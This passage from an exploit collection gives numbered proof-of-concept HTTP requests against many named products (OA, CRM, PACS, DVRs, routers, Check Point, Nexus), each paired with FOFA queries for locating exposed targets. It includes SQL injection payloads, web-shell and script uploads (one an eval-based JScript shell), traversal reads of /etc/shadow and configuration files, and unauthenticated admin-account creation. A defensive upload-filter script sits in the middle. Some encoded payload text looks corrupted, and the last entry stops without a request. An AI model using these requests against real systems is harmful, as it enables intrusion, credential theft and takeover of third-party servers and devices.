Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected models:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc parameter above decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;

157. MeiTe (美特) CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS / Masa CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote in contenthistid triggers a database error on vulnerable builds; entry 187 gives the time-based form of the same CVE.

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue is the base64-encoded file body: here a JScript .asmx web service whose Cmdshell method eval()s its Pass parameter. After the upload the service is invoked at:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 path traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) Smart Parking Fee System Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the target file name (a traversal path is accepted) and <fileFlow> carries the file content, base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file at http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) Multimedia Information Publishing System QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) Distribution Management System ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Smart Campus (慧校园 / 安校易) Management System FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The file is saved under a fixed name rather than the uploaded one: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL (path truncated in the source): https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

The injection point is the sortOrder parameter.

166. Zhongcheng Kexin (中成科信) Ticketing Management Platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

solutionNo decodes to ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE (MSSQL error-based); the string hello in the returned conversion error confirms the injection.

167. Lean Value Management System (精益价值管理系统, LVS) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 Vehicle Positioning and Monitoring Platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD License Plate Recognition Camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom Gateway Configuration Management System (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
The device configuration file is fetched by model name through a traversal rooted at the login page path /userLogin.asp/:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C Campus Network Self-Service System flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Verify with:
GET /imc/primepush/%2e%2e/flex/12234.txt

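A server-side upload guard for the multipart PoCs in entries 155, 157, 162, 163, 164, 176 and 178 (and the traversal filename of entry 161). This is an added example, not code from any vendor on this page: it parses a raw multipart/form-data body the way those endpoints receive it and rejects the three things every PoC above relies on, a server-executable extension behind an image Content-Type, script markers in the file body, and a path-traversal filename. The sample bodies are constructed to mirror entries 155 and 161; the field names and boundary are illustrative.

```python
"""Upload guard for the multipart file-upload PoCs above (added example,
not vendor code). It rejects executable extensions regardless of the
client-declared Content-Type, script markers in the body, and traversal
filenames. Sample bodies are constructed to mirror entries 155 and 161."""
import re
from typing import List, Tuple

# Extensions a PHP, Java or ASP.NET web server will execute on request.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "phtml", "phar",
                  "jsp", "jspx", "jspf",
                  "asp", "aspx", "asmx", "ashx", "asax", "cer", "soap"}
# Markers that give a web shell away whatever the extension or MIME type says.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script runat=", b"<jsp:")


def boundary_from_header(content_type: str) -> bytes:
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("not a multipart/form-data request")
    return m.group(2).encode()


def parse_multipart(content_type: str, body: bytes) -> List[dict]:
    """Minimal multipart/form-data parser: one dict per part with name,
    filename, content_type and data. Enough for a filter, not full RFC 7578."""
    delim = b"--" + boundary_from_header(content_type)
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing "--boundary--"
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        part = {"name": None, "filename": None, "content_type": None,
                "data": data.rstrip(b"\r\n")}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, val = line.partition(":")
            if key.lower() == "content-disposition":
                name = re.search(r'\bname="([^"]*)"', val)
                fname = re.search(r'\bfilename="([^"]*)"', val)
                part["name"] = name.group(1) if name else None
                part["filename"] = fname.group(1) if fname else None
            elif key.lower() == "content-type":
                part["content_type"] = val.strip()
        parts.append(part)
    return parts


def file_extensions(filename: str) -> List[str]:
    """All extensions of the last path component, so 'x.php.png' gives
    ['php', 'png'] and double-extension tricks stay visible."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    pieces = base.lower().split(".")
    return pieces[1:] if len(pieces) > 1 else []


def check_upload(content_type: str, body: bytes) -> Tuple[bool, List[str]]:
    """Return (accepted, reasons); any reason rejects the whole request."""
    reasons = []
    for part in parse_multipart(content_type, body):
        fname = part["filename"]
        if fname is None:
            continue                          # plain form field, not a file
        if ".." in fname or "/" in fname or "\\" in fname or "\x00" in fname:
            reasons.append(f"traversal or NUL in filename {fname!r}")
        bad = [e for e in file_extensions(fname) if e in EXECUTABLE_EXT]
        if bad:
            reasons.append(f"executable extension {bad} in {fname!r}")
        if any(m in part["data"][:4096].lower() for m in SCRIPT_MARKERS):
            reasons.append(f"script marker in {fname!r} "
                           f"(declared Content-Type {part['content_type']})")
    return (not reasons, reasons)


CT = "multipart/form-data; boundary=----WebKitFormBoundaryExample"
# Constructed, modelled on entry 155: PHP source behind Content-Type image/png.
BODY_SHELL = (b"------WebKitFormBoundaryExample\r\n"
              b'Content-Disposition: form-data; name="file"; filename="test.php"\r\n'
              b"Content-Type: image/png\r\n\r\n"
              b"<?php phpinfo();unlink(__FILE__);?>\r\n"
              b"------WebKitFormBoundaryExample--\r\n")
# Constructed, modelled on entry 161: traversal filename carrying ASP source.
BODY_TRAVERSAL = (b"------WebKitFormBoundaryExample\r\n"
                  b'Content-Disposition: form-data; name="file"; filename="../../../../dizxdell.aspx"\r\n'
                  b"Content-Type: application/octet-stream\r\n\r\n"
                  b'<% response.write("x") %>\r\n'
                  b"------WebKitFormBoundaryExample--\r\n")
# Constructed benign request: a text field plus a real PNG header.
BODY_OK = (b"------WebKitFormBoundaryExample\r\n"
           b'Content-Disposition: form-data; name="remotePath"\r\n\r\n'
           b"/opt/resources\r\n"
           b"------WebKitFormBoundaryExample\r\n"
           b'Content-Disposition: form-data; name="file"; filename="logo.png"\r\n'
           b"Content-Type: image/png\r\n\r\n"
           b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\r\n"
           b"------WebKitFormBoundaryExample--\r\n")

if __name__ == "__main__":
    for label, body in (("shell", BODY_SHELL), ("traversal", BODY_TRAVERSAL), ("ok", BODY_OK)):
        print(label, check_upload(CT, body))
```

The client-supplied Content-Type is never consulted for the decision; only the filename and the bytes are. Note what this filter does not do: entry 178 uploads a plain text file and would pass, because the defect there is an upload route reachable without authentication, and no content check substitutes for fixing that.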
179. Jianwen (建文) Engineering Management System arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based (MySQL updatexml): the current database user is returned inside the XPath error message.

181. Runshen (润申) Enterprise Standardization Management System UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) Enterprise Standardization Management System AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

The request creates the account test1234 / test1234 without authentication.

183. Guangzhou Tuchuang (图创) Interlib Library Cluster Management System updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

The token parameter is the injection point (Oracle error-based via ctxsys.drithsx.sn); the product of 111111*111111 appears in the error text.

184. Xunrao (迅饶) X2Modbus Gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL statement executed by the endpoint; this INSERT creates a root / 123456 account with privilege level 4.

185. Ruiyou (瑞友) Tianyi Application Virtualization System SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Stacked query with INTO OUTFILE: the unhex() payload is <?php echo md5("1"); $file = __FILE__; unlink($file); and is written to WebRoot\plom.xgi; requesting /plom.xgi afterwards should return c4ca4238a0b923820dcc509a6f75849b (md5 of 1) and delete the file.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA: title=="DataCube3"
